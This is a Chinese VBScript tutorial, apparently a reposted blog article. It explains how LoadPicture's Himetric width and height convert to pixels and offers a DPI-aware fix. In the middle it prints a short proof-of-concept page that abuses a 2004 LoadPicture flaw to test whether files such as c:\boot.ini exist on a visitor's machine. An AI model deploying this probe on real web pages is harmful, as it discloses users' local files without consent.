复制代码 代码如下:
<title>LoadPicture函数</title>
<form name="frm">
选择图片<input type="file" name="pic" onChange="GetPicInfor()" >
</form>
<script language="vbscript">
Sub GetPicInfor()
dim objpic,iWidth,iHeight
dim pictype,picpath
picpath=document.frm.pic.value
set objpic=Loadpicture(picpath)
iWidth = round(objpic.width / 26.4583) '26.4583是像素值
iHeight = round(objpic.height / 26.4583)
select case objpic.type
case 0
pictype = "None"
case 1
pictype = "Bitmap"
case 2
pictype = "Metafile"
case 3
pictype = "Icon"
case 4
pictype = "Win32-enhanced metafile"
end select
document.write "你选择了图片"&picpath
document.write "<li>长度:"&iHeight&"</li>"
document.write "<li>宽度:"&iwidth&"</li>"
document.write "<li>类型:"&pictype&"</li>"
End Sub
</script>
不过这个函数有个漏洞,可以探测电脑上存在的文件名。2004年的漏洞,微软现在也没补,示例:
复制代码 代码如下:
<form onsubmit="doIt(this);return false">
<input name="filename" value="c:\boot.ini" size="80" type="text"><input type="submit">
</form>
<script language="vbscript">
Sub loadIt(filename)
LoadPicture(filename)
End Sub
</script>
<script language="javascript">
function doIt(form) {
try {
loadIt(form.filename.value);
} catch(e) {
result = e.number;
}
if (result != -2146827856) {
alert('file exists');
} else {
alert('file does not exist');
}
}
</script>
这段代码中有一个“魔法数字(Magic Number)”26.4583,曾经有位昵称是“乱码”的朋友问过我这个26.4583是怎么来的,当时我也不知道。
前段时间逆向分析了一下vbscript.dll,才发现了其中的奥秘:
复制代码 代码如下:
26.4583 = 2540 / 96
那你一定要问,这个2540和96又是怎么来的?
要弄清楚这个问题,首先要知道VBS的LoadPicture函数返回的到底是什么,VBS文档是这么描述LoadPicture函数的:
Returns a picture object. Available only on 32-bit platforms.
只说返回图片对象,却没说该图片对象有什么属性和方法。文档语焉不详,只好动用OllyDbg了:
LoadPicture函数内部调用了OleLoadPicture函数,查文档可知返回的是IPictureDisp接口。不过后来我发现了更简单的方法,那就是查VB的函数声明(谁让它们是一家人呢),在VB的对象浏览器中查找LoadPicture函数:
Function LoadPicture([FileName], [Size], [ColorDepth], [X], [Y]) As IPictureDisp虽然VBS的LoadPicture函数比VB的简单,但是返回值应该是一样的。
好了,知道返回的是IPictureDisp接口,文档说它支持下面的属性:
| Property | Type | Access | Description |
|---|---|---|---|
| Handle | OLE_HANDLE (int) | R | The Windows GDI handle of the picture |
| hPal | OLE_HANDLE (int) | RW | The Windows handle of the palette used by the picture. |
| Type | short | R | The type of picture (see PICTYPE). |
| Width | OLE_XSIZE_HIMETRIC (long) | R | The width of the picture. |
| Height | OLE_YSIZE_HIMETRIC (long) | R | The height of the picture. |
我们只关心Width和Height,它们分别表示图片的宽和高,但是它们的单位不是像素(Pixel),而是Himetric,我们要做的是把Himetric换算成Pixel。
首先把Himetric换算成英寸(Inch),1 Himetric = 0.01 mm,1 Inch = 2.54 cm,所以1 Inch = 2540 Himetric。
然后从Inch换算成Pixel,1 Inch等于多少Pixel呢?这是由系统的DPI(Dot Per Inch)设置决定的,默认值是96。
现在知道2540和96是怎么来的了吧?不过上面的代码存在两个问题:第一,使用了2540/96的近似值,可能会有误差;第二,使用了DPI的默认值96,而DPI的值是可以在控制面板中修改的。
VBS中LoadPicture函数的正确用法是:
复制代码 代码如下:
Option Explicit
'By Demon
Dim p
Set p = LoadPicture("D:\test.jpg")
WScript.Echo "Width: " & Himetric2Pixel(p.Width)
WScript.Echo "Height: " & Himetric2Pixel(p.Height)
Function Himetric2Pixel(n)
'1 Inch = 2540 Himetric
Const key = "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics\AppliedDPI"
Dim WshShell, dpi
Set WshShell = WScript.CreateObject("Wscript.Shell")
dpi = WshShell.RegRead(key)
Himetric2Pixel = Round(n * dpi / 2540)
End Function
Windows 7下通过测试,其他系统中获取DPI的方法可能会不同,请自行修改。
上面修正的内容来自: http://demon.tw/programming/vbs-loadpicture.html